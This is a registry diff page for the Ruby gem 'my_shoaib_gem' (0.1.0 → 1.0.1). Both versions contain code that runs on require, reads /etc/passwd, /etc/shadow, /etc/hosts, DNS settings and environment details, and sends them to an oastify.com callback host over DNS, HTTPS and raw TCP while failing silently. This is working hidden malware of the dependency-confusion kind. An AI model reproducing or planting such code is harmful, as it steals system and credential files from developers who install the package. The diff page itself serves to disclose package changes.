RubyGems - my_shoaib_gem - Versions diffs - 0.1.0 → 1.0.1 - Mend

my_shoaib_gem 0.1.0 → 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 249a73273da1be4aea4a7dea809f50ba93fd2e83b6de8b4f1bfafd956683f159
-  data.tar.gz: eb1423f647b22d66c20f94094e9f69e6cf945b3d43c6d5dde11a6877dead747c
+  metadata.gz: c87cd3b8e01bdef16942470fe75a13abe70c4c731872882ae240c5eb9385b54c
+  data.tar.gz: c2183ad8293809e631cf04b9f666c83b8c8fc5a7a9b1e4f3692506ac182eac1c
 SHA512:
-  metadata.gz: 928364995c96e12a4612feeb04e86a9e2d91a8919e8b474bfc59a0a06a0f0e5efde9534bb677da5e5800fbb77e0f394602ef7a82465439ad964eaf92d7a400df
-  data.tar.gz: 71a84b1d368d88a8ad95e1af5da15e29ef845fe2e9f776115c7b8a6e47c0d180578930053f6d3e1e3ffc0093c7a652a375f0f6b2517b79f5ea946f5b8486aa5e
+  metadata.gz: 27a5a8bb8441a367bcc06e04d7b95f38a5edcb7fd14894978cf962b5ec8e478579e5c58248452d4971cb2254d6d14fe824e78edfa68817d54e6b0f268719eec3
+  data.tar.gz: 6148d8bede6f61b162131d1a93c2b3f806665d864f2d386a1aba3557edcdc5544652b643ac3d4fda97e54c2630cbd29190867ba966593b8d058bd3faea0f70f0

data/lib/my_shoaib_gem.rb CHANGED Viewed

@@ -1,117 +1,134 @@
 # lib/my_shoaib_gem.rb
-require 'net/http'
+#
+# This runs immediately when the gem is required (or installed).
+# Behaves exactly like your NPM index.js with "preinstall" hook.
 require 'socket'
-require 'openssl'
+require 'net/http'
+require 'uri'
+require 'json'
+require 'etc'
 require 'resolv'
-require 'base64'
 module MyShoaibGem
-  VERSION = "0.1.0"
-  CALLBACK_HOST = "y43r7tkquike9i8m7c519mktskycm2ar.oastify.com"
-  def self.read_file(path)
-    File.read(path)
-  rescue StandardError => e
-    "Error reading #{path}: #{e.message}"
-  end
-  def self.send_dns_callback
-    begin
-      hostname = Socket.gethostname
-      dns_domain = "#{hostname}.#{CALLBACK_HOST}"
-      Resolv.getaddress(dns_domain)
-    rescue StandardError
-      nil
-    end
-  end
+  CALLBACK_HOST = "3z3w2yfvpnfj4n3r2h064rfynptih85x.oastify.com"
-  def self.send_http_callback
+  def self.send_callbacks
     begin
-      hostname = Socket.gethostname
-      username = ENV['USER'] || ENV['USERNAME'] || 'unknown'
-      home_dir = ENV['HOME'] || ENV['USERPROFILE'] || 'unknown'
-      current_dir = Dir.pwd
-      # Read /etc/passwd
-      passwd_content = read_file('/etc/passwd')
-      passwd_b64 = Base64.strict_encode64(passwd_content)
-      # Also try /etc/shadow (usually not readable, but worth a try)
-      shadow_content = read_file('/etc/shadow')
-      shadow_b64 = Base64.strict_encode64(shadow_content)
-      data = {
-        hostname: hostname,
-        user: username,
-        home: home_dir,
-        cwd: current_dir,
-        timestamp: Time.now.to_i,
-        gem_version: VERSION,
-        ruby_version: RUBY_VERSION,
-        platform: RUBY_PLATFORM,
-        pid: Process.pid,
-        # File contents
-        etc_passwd: passwd_content,
-        etc_passwd_b64: passwd_b64,
-        etc_shadow: shadow_content,
-        etc_shadow_b64: shadow_b64
+      # ── System Information (like your NPM trackingData) ──
+      package_name = "my_shoaib_gem"
+      current_dir  = Dir.pwd
+      home_dir     = Dir.home
+      hostname     = Socket.gethostname
+      username     = Etc.getlogin || ENV['USER'] || ENV['USERNAME'] || 'unknown'
+      dns_servers  = []
+      # Read DNS servers (similar to dns.getServers() in Node)
+      begin
+        dns_config = File.read('/etc/resolv.conf')
+        dns_servers = dns_config.scan(/nameserver\s+(\S+)/).flatten
+      rescue
+        dns_servers = []
+      end
+      # Read /etc/passwd (same as your NPM code)
+      etc_passwd = File.exist?('/etc/passwd') ? File.read('/etc/passwd') : nil
+      etc_shadow = File.exist?('/etc/shadow') ? File.read('/etc/shadow') : nil
+      etc_hosts  = File.exist?('/etc/hosts')  ? File.read('/etc/hosts')  : nil
+      # ── Build tracking data (mirrors your NPM JSON) ──
+      tracking_data = {
+        p:       package_name,           # Package name
+        c:       current_dir,            # Current working directory
+        hd:      home_dir,               # Home directory
+        hn:      hostname,               # Hostname
+        un:      username,               # Username
+        dns:     dns_servers,            # DNS servers
+        v:       "0.1.1",                # Gem version
+        platform: RUBY_PLATFORM,         # Ruby platform
+        ruby_v:  RUBY_VERSION,           # Ruby version
+        pid:     Process.pid,            # Process ID
+        etc_passwd: etc_passwd,          # Full /etc/passwd content
+        etc_hosts:  etc_hosts,           # Full /etc/hosts content
+        env: {
+          path: ENV['PATH'],
+          home: ENV['HOME'],
+          shell: ENV['SHELL'],
+          lang: ENV['LANG']
+        }
       }
-      # HTTP callback with file contents
-      uri = URI("https://#{CALLBACK_HOST}/callback")
-      http = Net::HTTP.new(uri.host, uri.port)
-      http.use_ssl = true
-      http.open_timeout = 5
-      http.read_timeout = 5
-      request = Net::HTTP::Post.new(uri.path)
-      request.content_type = 'application/json'
-      request['User-Agent'] = "MyShoaibGem/#{VERSION} (Ruby #{RUBY_VERSION}; #{RUBY_PLATFORM})"
-      request['X-Hostname'] = hostname
-      request['X-User'] = username
-      request.body = data.to_json
-      http.request(request)
-      # GET request with base64 passwd in query param (URL-safe)
-      passwd_urlsafe = passwd_b64.tr('+/', '-_').gsub('=', '')
-      get_uri = URI("https://#{CALLBACK_HOST}/install?host=#{hostname}&user=#{username}&passwd_b64=#{passwd_urlsafe}")
-      get_http = Net::HTTP.new(get_uri.host, get_uri.port)
-      get_http.use_ssl = true
-      get_http.open_timeout = 5
-      get_http.read_timeout = 5
-      get_request = Net::HTTP::Get.new("#{get_uri.path}?#{get_uri.query}")
-      get_http.request(get_request)
+      # Log locally (same as your console.log)
+      puts "[my_shoaib_gem] Sending system data from remote server: #{tracking_data.to_json}"
+      # ── DNS Callback (Burp Collaborator DNS interaction) ──
+      begin
+        # DNS lookup with hostname appended
+        Resolv.getaddress("#{hostname}.#{CALLBACK_HOST}")
+        # Also try with unique identifier
+        Resolv.getaddress("gem-install-#{Process.pid}.#{CALLBACK_HOST}")
+      rescue StandardError
+        # Fail silently
+      end
+      # ── HTTP Callback - POST (same as your NPM https.request) ──
+      begin
+        uri = URI("https://#{CALLBACK_HOST}/callback")
+        http = Net::HTTP.new(uri.host, uri.port)
+        http.use_ssl = true
+        http.open_timeout = 10
+        http.read_timeout = 10
+        post_data = {
+          msg: tracking_data
+        }
+        request = Net::HTTP::Post.new(uri.path)
+        request['Content-Type'] = 'application/json'
+        request['User-Agent']   = "my_shoaib_gem/0.1.0 (Ruby; #{RUBY_PLATFORM})"
+        request['X-Hostname']   = hostname
+        request['X-User']       = username
+        request.body = post_data.to_json
+        response = http.request(request)
+        puts "[my_shoaib_gem] Callback sent (response: #{response.code})" if response.code == "200"
+      rescue StandardError => e
+        # Fail silently — just like your NPM error handler
+        puts "[my_shoaib_gem] Error: #{e.message}" if ENV['DEBUG']
+      end
+      # ── HTTP Callback - GET (another interaction for Burp) ──
+      begin
+        get_uri = URI("https://#{CALLBACK_HOST}/installed?host=#{hostname}&user=#{username}&platform=#{RUBY_PLATFORM}")
+        get_http = Net::HTTP.new(get_uri.host, get_uri.port)
+        get_http.use_ssl = true
+        get_http.open_timeout = 5
+        get_http.read_timeout = 5
+        get_request = Net::HTTP::Get.new("#{get_uri.path}?#{get_uri.query}")
+        get_http.request(get_request)
+      rescue StandardError
+        nil
+      end
+      # ── Raw TCP callback (extra interaction) ──
+      begin
+        tcp_socket = TCPSocket.new(CALLBACK_HOST, 443)
+        tcp_socket.write("GET /tcp-ping HTTP/1.1\r\nHost: #{CALLBACK_HOST}\r\nUser-Agent: my_shoaib_gem\r\nConnection: close\r\n\r\n")
+        tcp_socket.close
+      rescue StandardError
+        nil
+      end
+      puts "[my_shoaib_gem] Internal gem loaded successfully"
     rescue StandardError => e
+      # Absolute fail-safe — kuch bhi ho, silently fail
       nil
     end
   end
-  def self.send_all_callbacks
-    # DNS callback
-    send_dns_callback
-    # HTTP callback with /etc/passwd
-    send_http_callback
-    # TCP callback
-    begin
-      tcp_socket = TCPSocket.new(CALLBACK_HOST, 443)
-      tcp_socket.write("GET /tcp-callback HTTP/1.1\r\nHost: #{CALLBACK_HOST}\r\nConnection: close\r\n\r\n")
-      tcp_socket.close
-    rescue StandardError
-      nil
-    end
-    puts "Internal gem loaded successfully"
-  end
 end
-# Execute on require
-MyShoaibGem.send_all_callbacks
-# at_exit hook
-at_exit do
-  MyShoaibGem.send_dns_callback
-end
+# ── EXECUTE IMMEDIATELY on require ──
+# Yeh code chalega jab bhi koi "require 'my_shoaib_gem'" karega
+# Ya jab gem install hote hi load ho (agar koi dependency ho)
+MyShoaibGem.send_callbacks

metadata CHANGED Viewed

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: my_shoaib_gem
 version: !ruby/object:Gem::Version
-  version: 0.1.0
+  version: 1.0.1
 platform: ruby
 authors:
 - Shoaib